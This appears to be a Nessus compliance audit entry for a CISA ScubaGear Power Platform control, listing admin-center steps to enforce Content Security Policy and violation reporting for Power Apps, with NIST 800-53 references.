MS.POWERPLATFORM.4.1v1 - Content Security Policy (CSP) SHALL be enforced for model-driven and canvas Power Apps.

Information

Adds CSP as a defense mechanism for Power Apps against common website attacks.

NOTE: Nessus has provided the target output to assist in reviewing the benchmark to ensure target compliance.

Solution

1. Sign in to your tenant environment's respective [Power Platform admin
center](https://learn.microsoft.com/en-us/power-platform/admin/powerapps-us-government#power-apps-us-government-service-urls).

2. On the left-hand pane click on Environments and then select an environment from the list.

3. Select the Settings icon at the top of the page.

4. Click on Product then click on Privacy + Security from the options that appear.

5. At the bottom of the page under the Content security policy section, turn the slider On for Model-driven and Canvas.

6. At the same location, set Enable reporting to On and add an appropriate endpoint for reporting CSP violations can be reported to.

7. Repeat steps 2 to 6 for all active Power Platform environments.

See Also

https://github.com/cisagov/ScubaGear/tree/v1.5.0/

Item Details

Category: ACCESS CONTROL, SECURITY ASSESSMENT AND AUTHORIZATION, CONFIGURATION MANAGEMENT, IDENTIFICATION AND AUTHENTICATION, RISK ASSESSMENT, SYSTEM AND SERVICES ACQUISITION, SYSTEM AND COMMUNICATIONS PROTECTION, SYSTEM AND INFORMATION INTEGRITY

References: 800-53|AC-2, 800-53|AC-3, 800-53|AC-4, 800-53|AC-5, 800-53|AC-6, 800-53|CA-2, 800-53|CA-7, 800-53|CM-5, 800-53|CM-6, 800-53|CM-7, 800-53|CM-8, 800-53|IA-2, 800-53|IA-8, 800-53|RA-5, 800-53|SA-8, 800-53|SC-2, 800-53|SC-3, 800-53|SC-7, 800-53|SC-18, 800-53|SC-29, 800-53|SC-30, 800-53|SC-39, 800-53|SI-2, 800-53|SI-3, 800-53|SI-4, 800-53|SI-7, 800-53|SI-10

Plugin: microsoft_azure

Control ID: 133af0735c4f6d2d84c4db5c859cd4b452a3e1dd6f10e89b3089ecf5e086fe33